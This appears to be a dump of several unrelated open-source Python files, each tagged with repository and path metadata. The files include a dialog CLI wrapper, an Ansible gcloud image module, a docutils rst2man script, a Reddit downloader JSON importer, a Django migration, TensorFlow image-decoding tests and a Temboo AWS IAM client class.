'--radiolist': (do_radiolist,
"text height width list-height [ tag item status ] ..."),
'--textbox': (do_textbox,
"file height width"),
'--yesno': (do_yesno,
"text height width"),
}
def show_usage():
"""
Display a helpful usage message.
"""
modelist = [(mode, help) for (mode, (fn, help)) in MODES.items()]
modelist.sort()
sys.stdout.write(
__doc__ +
"\n".join(["%-15s %s"%(mode,help) for (mode,help) in modelist])
+ """
height and width may be set to 0 to auto-size.
list-height and menu-height are currently ignored.
status may be either on or off.
""" )
def main():
if len(sys.argv) < 2 or sys.argv[1] not in MODES:
show_usage()
return
# Create a DialogDisplay instance
fn, help = MODES[sys.argv[1]]
d = fn( * sys.argv[2:] )
# Run it
exitcode, exitstring = d.main()
# Exit
if exitstring:
sys.stderr.write(exitstring+"\n")
sys.exit(exitcode)
if __name__=="__main__":
main()
|
hmen89/odoo
|
refs/heads/master
|
addons/analytic_user_function/__init__.py
|
441
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import analytic_user_function
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
drewandersonnz/openshift-tools
|
refs/heads/prod
|
ansible/roles/lib_gcloud/build/ansible/gcloud_compute_image.py
|
13
|
# pylint: skip-file
# vim: expandtab:tabstop=4:shiftwidth=4
#pylint: disable=too-many-branches
def main():
''' ansible module for gcloud compute images'''
module = AnsibleModule(
argument_spec=dict(
# credentials
state=dict(default='present', type='str',
choices=['present', 'absent', 'list']),
name=dict(default=None, type='str'),
description=dict(default=None, type='str'),
family=dict(default=None, type='str'),
licenses=dict(default=None, type='list'),
source_disk=dict(default=None, type='str'),
source_disk_zone=dict(default=None, type='str'),
source_uri=dict(default=None, type='str'),
),
supports_check_mode=True,
)
gimage = GcloudComputeImage(module.params['name'],
module.params['description'],
module.params['family'],
module.params['licenses'],
module.params['source_disk'],
module.params['source_disk_zone'],
module.params['source_uri'])
state = module.params['state']
api_rval = gimage.list_images(module.params['name'])
#####
# Get
#####
if state == 'list':
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval, state="list")
module.exit_json(changed=False, results=api_rval['results'], state="list")
########
# Delete
########
if state == 'absent':
if gimage.exists():
if module.check_mode:
module.exit_json(changed=False, msg='Would have performed a delete.')
api_rval = gimage.delete_image()
module.exit_json(changed=True, results=api_rval, state="absent")
module.exit_json(changed=False, state="absent")
if state == 'present':
########
# Create
########
if not gimage.exists():
if module.check_mode:
module.exit_json(changed=False, msg='Would have performed a create.')
# Create it here
api_rval = gimage.create_image()
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval)
module.exit_json(changed=True, results=api_rval, state="present")
module.exit_json(changed=False, results=api_rval, state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
#if __name__ == '__main__':
# gcloud = GcloudComputeImage('rhel-7-base-2016-06-10')
# print gcloud.list_images()
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
from ansible.module_utils.basic import *
main()
|
nooperpudd/quantbube
|
refs/heads/master
|
quantbube/singals.py
|
3
|
# encoding:utf-8
|
drakeloud/louderdev
|
refs/heads/master
|
louderdev/bin/rst2man.py
|
1
|
#!/Users/Drake/dev/LouderDev/louderdev/bin/python3
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
|
MalloyDelacroix/DownloaderForReddit
|
refs/heads/master
|
DownloaderForReddit/utils/importers/json_importer.py
|
1
|
"""
Downloader for Reddit takes a list of reddit users and subreddits and downloads content posted to reddit either by the
users or on the subreddits.
Copyright (C) 2017, Kyle Hickey
This file is part of the Downloader for Reddit.
Downloader for Reddit is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Downloader for Reddit is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Downloader for Reddit. If not, see <http://www.gnu.org/licenses/>.
"""
import json
import logging
from datetime import datetime
from . import legacy_import
from DownloaderForReddit.database.models import User, Subreddit
from DownloaderForReddit.database.model_enums import (LimitOperator, PostSortMethod, NsfwFilter, CommentDownload,
CommentSortMethod)
logger = logging.getLogger(f'DownloaderForReddit.{__name__}')
EXPELLED_KEYS = ['lists', 'posts', 'content', 'comments']
TYPE_MAP = {
'date_created': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p'),
'post_score_limit_operator': lambda x: LimitOperator(x),
'post_sort_method': lambda x: PostSortMethod(x),
'download_nsfw': lambda x: NsfwFilter(x),
'extract_comments': lambda x: CommentDownload(x),
'download_comments': lambda x: CommentDownload(x),
'download_comment_content': lambda x: CommentDownload(x),
'comment_score_limit_operator': lambda x: LimitOperator(x),
'comment_sort_method': lambda x: CommentSortMethod(x),
'date_added': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p'),
'absolute_date_limit': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p'),
'date_limit': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p')
}
def import_json(file_path):
reddit_objects = []
with open(file_path, 'r', encoding='utf-8') as file:
j = json.load(file)
try:
reddit_objects = import_reddit_objects(j)
logger.info('Imported reddit objects from json file', extra={'file_path': file_path,
'import_count': len(reddit_objects)})
except KeyError:
pass
return reddit_objects
def import_reddit_objects(json_element):
new_ros = json_element.get('reddit_objects', None)
ro_lists = json_element.get('reddit_object_lists', None)
legacy_ros = json_element.get('object_list', None)
if new_ros is not None:
return _get_reddit_objects(new_ros)
elif ro_lists is not None:
ros = []
for ro_list in ro_lists:
ros.extend(ro_list['reddit_objects'])
return _get_reddit_objects(ros)
else:
return legacy_import.import_legacy(legacy_ros)
def _get_reddit_objects(ro_data):
reddit_objects = []
for ro in ro_data:
model = User if ro['object_type'] == 'USER' else Subreddit
_clean_ro_element(ro)
reddit_object = model(**ro)
reddit_objects.append(reddit_object)
return reddit_objects
def _clean_ro_element(ro_element):
for key in EXPELLED_KEYS:
try:
del ro_element[key]
except KeyError:
pass
for key, value in ro_element.items():
try:
ro_element[key] = TYPE_MAP[key](value)
except (KeyError, TypeError):
pass
|
litui/openparliament
|
refs/heads/master
|
parliament/accounts/migrations/0003_rename_data.py
|
2
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_add_name_and_bouncedata'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='json_data',
),
migrations.AddField(
model_name='user',
name='data',
field=jsonfield.fields.JSONField(default={}),
),
]
|
gunan/tensorflow
|
refs/heads/master
|
tensorflow/python/kernel_tests/decode_image_op_test.py
|
22
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for decode_image."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import numpy as np
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import test_util
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import io_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
prefix_path = "tensorflow/core/lib"
class DecodeImageOpTest(test.TestCase):
def testBmp(self):
# Read a real bmp and verify shape
path = os.path.join(prefix_path, "bmp", "testdata", "lena.bmp")
with self.session(use_gpu=True) as sess:
bmp0 = io_ops.read_file(path)
image0 = image_ops.decode_image(bmp0)
image1 = image_ops.decode_bmp(bmp0)
bmp0, image0, image1 = self.evaluate([bmp0, image0, image1])
self.assertEqual(len(bmp0), 4194)
self.assertAllEqual(image0, image1)
@test_util.run_deprecated_v1
def testGif(self):
# Read some real GIFs
path = os.path.join(prefix_path, "gif", "testdata", "scan.gif")
width = 20
height = 40
stride = 5
shape = (12, height, width, 3)
with self.session(use_gpu=True) as sess:
gif0 = io_ops.read_file(path)
image0 = image_ops.decode_image(gif0)
image1 = image_ops.decode_gif(gif0)
gif0, image0, image1 = self.evaluate([gif0, image0, image1])
self.assertEqual(image0.shape, shape)
self.assertAllEqual(image0, image1)
for frame_idx, frame in enumerate(image0):
gt = np.zeros(shape[1:], dtype=np.uint8)
start = frame_idx * stride
end = (frame_idx + 1) * stride
if end <= width:
gt[:, start:end, :] = 255
else:
start -= width
end -= width
gt[start:end, :, :] = 255
self.assertAllClose(frame, gt)
bad_channels = image_ops.decode_image(gif0, channels=1)
with self.assertRaises(errors_impl.InvalidArgumentError):
self.evaluate(bad_channels)
@test_util.run_deprecated_v1
def testJpeg(self):
# Read a real jpeg and verify shape
path = os.path.join(prefix_path, "jpeg", "testdata", "jpeg_merge_test1.jpg")
with self.session(use_gpu=True) as sess:
jpeg0 = io_ops.read_file(path)
image0 = image_ops.decode_image(jpeg0)
image1 = image_ops.decode_jpeg(jpeg0)
jpeg0, image0, image1 = self.evaluate([jpeg0, image0, image1])
self.assertEqual(len(jpeg0), 3771)
self.assertEqual(image0.shape, (256, 128, 3))
self.assertAllEqual(image0, image1)
bad_channels = image_ops.decode_image(jpeg0, channels=4)
with self.assertRaises(errors_impl.InvalidArgumentError):
self.evaluate(bad_channels)
def testPng(self):
# Read some real PNGs, converting to different channel numbers
inputs = [(1, "lena_gray.png")]
for channels_in, filename in inputs:
for channels in 0, 1, 3, 4:
with self.cached_session(use_gpu=True) as sess:
path = os.path.join(prefix_path, "png", "testdata", filename)
png0 = io_ops.read_file(path)
image0 = image_ops.decode_image(png0, channels=channels)
image1 = image_ops.decode_png(png0, channels=channels)
png0, image0, image1 = self.evaluate([png0, image0, image1])
self.assertEqual(image0.shape, (26, 51, channels or channels_in))
self.assertAllEqual(image0, image1)
@test_util.run_deprecated_v1
def testInvalidBytes(self):
image_bytes = b"ThisIsNotAnImage!"
decode = image_ops.decode_image(image_bytes)
with self.cached_session():
with self.assertRaises(errors_impl.InvalidArgumentError):
self.evaluate(decode)
if __name__ == "__main__":
test.main()
|
jordanemedlock/psychtruths
|
refs/heads/master
|
temboo/Library/Amazon/IAM/DeleteSigningCertificate.py
|
5
|
# -*- coding: utf-8 -*-
###############################################################################
#
# DeleteSigningCertificate
# Deletes the specified signing certificate associated with the specified user.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteSigningCertificate(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteSigningCertificate Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(DeleteSigningCertificate, self).__init__(temboo_session, '/Library/Amazon/IAM/DeleteSigningCertificate')
def new_input_set(self):
return DeleteSigningCertificateInputSet()
def _make_result_set(self, result, path):
return DeleteSigningCertificateResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteSigningCertificateChoreographyExecution(session, exec_id, path)
class DeleteSigningCertificateInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteSigningCertificate
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
super(DeleteSigningCertificateInputSet, self)._set_input('AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
super(DeleteSigningCertificateInputSet, self)._set_input('AWSSecretKeyId', value)
def set_CertificateId(self, value):
"""
Set the value of the CertificateId input for this Choreo. ((required, string) ID of the signing certificate to delete.)
"""
super(DeleteSigningCertificateInputSet, self)._set_input('CertificateId', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)
"""
super(DeleteSigningCertificateInputSet, self)._set_input('ResponseFormat', value)
def set_UserName(self, value):
"""
Set the value of the UserName input for this Choreo. ((optional, string) Name of the user the signing certificate belongs to.)
"""
super(DeleteSigningCertificateInputSet, self)._set_input('UserName', value)
class DeleteSigningCertificateResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteSigningCertificate Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
"""
return self._output.get('Response', None)
class DeleteSigningCertificateChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteSigningCertificateResultSet(response, path)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.